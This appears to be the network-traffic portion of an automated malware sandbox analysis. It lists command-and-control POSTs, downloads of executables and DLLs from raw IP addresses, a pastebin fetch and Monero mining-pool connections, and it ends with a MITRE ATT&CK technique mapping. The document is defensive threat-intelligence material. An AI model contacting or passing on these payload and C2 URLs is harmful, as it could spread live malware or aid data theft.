HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

752 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
5.42.92.211:80

http://5.42.92.211/loghub/master

http

AppLaunch.exe

752 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

Explorer.EXE

539.4kB
16.4MB
8722
12225

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
77.91.124.55:19071

2NB190Af.exe

260 B
5
77.91.124.55:19071

AppLaunch.exe

260 B
5
142.250.179.141:443

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcXK4A0ARVCCFhv8WUve3dys29_ScIbz3InilWJFAdOSJXoPCqO5D-eYfwnlyLTD0-YZFDHWw

tls, http2

msedge.exe

2.7kB
10.2kB
21
26

HTTP Request

GET https://accounts.google.com/

HTTP Request

GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

HTTP Request

GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhcXK4A0ARVCCFhv8WUve3dys29_ScIbz3InilWJFAdOSJXoPCqO5D-eYfwnlyLTD0-YZFDHWw
157.240.201.35:443

www.facebook.com

tls

msedge.exe

18.3kB
326.6kB
149
255
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

16.4kB
376.8kB
252
343
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.27:443

static.xx.fbcdn.net

tls

msedge.exe

989 B
3.0kB
9
7
157.240.30.35:443

facebook.com

tls

msedge.exe

1.6kB
3.4kB
12
10
157.240.30.35:443

fbcdn.net

tls

msedge.exe

1.9kB
4.8kB
16
12
142.251.36.14:443

https://play.google.com/log?format=json&hasfast=true&authuser=0

tls, http2

msedge.exe

1.8kB
8.3kB
15
13

HTTP Request

OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

1.5kB
1.2kB
9
9

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
185.216.70.222:80

http://185.216.70.222/trafico.exe

http

Explorer.EXE

11.4kB
455.5kB
232
330

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

18.4kB
296.2kB
224
232

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2NB190Af.exe

260 B
5
85.209.176.171:80

http://85.209.176.171/

http

43A5.exe

1.7MB
26.8kB
1205
504

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200
104.20.68.143:443

https://pastebin.com/raw/8baCJyMF

tls, http

423C.exe

726 B
3.6kB
8
7

HTTP Request

GET https://pastebin.com/raw/8baCJyMF

HTTP Response

200
95.217.246.182:8443

tak.soydet.top

423C.exe

632.2kB
14.8kB
467
188
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.7kB
6.9kB
11
11

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.3kB
18.3kB
19
17

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.75.172:443

https://api.ip.sb/geoip

tls, http

43A5.exe

713 B
4.1kB
8
6

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

4.1kB
94.8kB
75
74

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2NB190Af.exe

260 B
5
194.169.175.127:80

http://host-host-file8.com/

http

Explorer.EXE

831 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.3kB
1.4kB
8
6

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

30.2kB
1.7kB
26
13

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

16.4kB
1.6kB
17
11

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

RegSvcs.exe

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

18.6kB
1.6kB
18
10

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls

89.1kB
2.5MB
1846
1841
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
16
14
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
162.159.130.233:443

cdn.discordapp.com

tls

1.1kB
4.7kB
12
12
185.82.216.49:443

server5.cdntokiog.studio

tls

1.8kB
7.5kB
13
15
77.91.124.55:19071

260 B
5
188.114.97.0:443

walkinglate.com

tls

47.9kB
2.2MB
999
1604
77.91.124.55:19071

260 B
5
172.67.212.39:80

http://bytecloudasa.website/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
172.67.212.39:80

http://bytecloudasa.website/api

http

470.9kB
9.2kB
341
184

HTTP Request

POST http://bytecloudasa.website/api

HTTP Response

200
212.47.253.124:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.4kB
9
8
172.67.34.170:443

pastebin.com

tls

1.0kB
6.0kB
11
11
51.68.143.81:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.8kB
9
8
77.91.124.55:19071

208 B
4
77.91.124.55:19071

208 B
4

8.8.8.8:53

254.178.238.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.178.238.8.in-addr.arpa
8.8.8.8:53

133.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

133.32.126.40.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

54.120.234.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

54.120.234.20.in-addr.arpa
8.8.8.8:53

198.1.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

198.1.85.104.in-addr.arpa
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.201.35
142.250.179.141:443

accounts.google.com

https

msedge.exe

9.1kB
124.7kB
75
118
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

360 B
5

DNS Request

171.39.242.20.in-addr.arpa

DNS Request

171.39.242.20.in-addr.arpa

DNS Request

171.39.242.20.in-addr.arpa

DNS Request

171.39.242.20.in-addr.arpa

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

35.201.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.201.240.157.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.30.27
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.30.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.30.35
8.8.8.8:53

27.30.240.157.in-addr.arpa

dns

144 B
116 B
2
1

DNS Request

27.30.240.157.in-addr.arpa

DNS Request

27.30.240.157.in-addr.arpa
8.8.8.8:53

35.30.240.157.in-addr.arpa

dns

144 B
125 B
2
1

DNS Request

35.30.240.157.in-addr.arpa

DNS Request

35.30.240.157.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbsbx.com

DNS Response

157.240.30.35
8.8.8.8:53

254.210.247.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.210.247.8.in-addr.arpa
8.8.8.8:53

195.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

195.179.250.142.in-addr.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

196.168.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.168.217.172.in-addr.arpa
224.0.0.251:5353

755 B
12
8.8.8.8:53

play.google.com

dns

msedge.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.251.36.14
142.251.36.14:443

play.google.com

https

msedge.exe

3.4kB
7.6kB
8
11
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

423C.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.68.143

104.20.67.143

172.67.34.170
8.8.8.8:53

143.68.20.104.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

143.68.20.104.in-addr.arpa

DNS Request

143.68.20.104.in-addr.arpa
8.8.8.8:53

tak.soydet.top

dns

423C.exe

120 B
152 B
2
2

DNS Request

tak.soydet.top

DNS Response

95.217.246.182

DNS Request

tak.soydet.top

DNS Response

95.217.246.182
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

172.67.212.39

104.21.61.162
8.8.8.8:53

182.246.217.95.in-addr.arpa

dns

146 B
262 B
2
2

DNS Request

182.246.217.95.in-addr.arpa

DNS Request

182.246.217.95.in-addr.arpa
8.8.8.8:53

39.212.67.172.in-addr.arpa

dns

144 B
268 B
2
2

DNS Request

39.212.67.172.in-addr.arpa

DNS Request

39.212.67.172.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

43A5.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.13.31

104.26.12.31
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

172.75.67.172.in-addr.arpa
142.251.36.14:443

play.google.com

https

msedge.exe

3.9kB
3.3kB
10
11
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

194.169.175.127
8.8.8.8:53

bytecloudasa.website

dns

RegSvcs.exe

66 B
98 B
1
1

DNS Request

bytecloudasa.website

DNS Response

172.67.212.39

104.21.61.162
8.8.8.8:53

127.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

127.175.169.194.in-addr.arpa
8.8.8.8:53

50ca6d47-81f2-4487-90e1-3a96370ad5b4.uuid.cdntokiog.studio

dns

csrss.exe

104 B
163 B
1
1

DNS Request

50ca6d47-81f2-4487-90e1-3a96370ad5b4.uuid.cdntokiog.studio
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

server5.cdntokiog.studio

dns

70 B
86 B
1
1

DNS Request

server5.cdntokiog.studio

DNS Response

185.82.216.49
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.133.233

162.159.134.233

162.159.135.233

162.159.129.233
8.8.8.8:53

stun2.l.google.com

dns

64 B
80 B
1
1

DNS Request

stun2.l.google.com

DNS Response

74.125.24.127
74.125.24.127:19302

stun2.l.google.com

96 B
120 B
2
2
8.8.8.8:53

walkinglate.com

dns

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.97.0

188.114.96.0
8.8.8.8:53

0.97.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.97.114.188.in-addr.arpa
8.8.8.8:53

49.216.82.185.in-addr.arpa

dns

72 B
95 B
1
1

DNS Request

49.216.82.185.in-addr.arpa
8.8.8.8:53

233.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.130.159.162.in-addr.arpa
8.8.8.8:53

127.24.125.74.in-addr.arpa

dns

72 B
106 B
1
1

DNS Request

127.24.125.74.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

163.172.154.142

51.68.190.80

212.47.253.124

51.15.193.130

51.15.58.224

135.125.238.108

51.255.34.118

51.68.143.81

51.15.65.182
8.8.8.8:53

pastebin.com

dns

423C.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.68.143

104.20.67.143
8.8.8.8:53

124.253.47.212.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

124.253.47.212.in-addr.arpa
8.8.8.8:53

170.34.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

81.143.68.51.in-addr.arpa

dns

71 B
109 B
1
1

DNS Request

81.143.68.51.in-addr.arpa
8.8.8.8:53

208.143.182.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

208.143.182.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery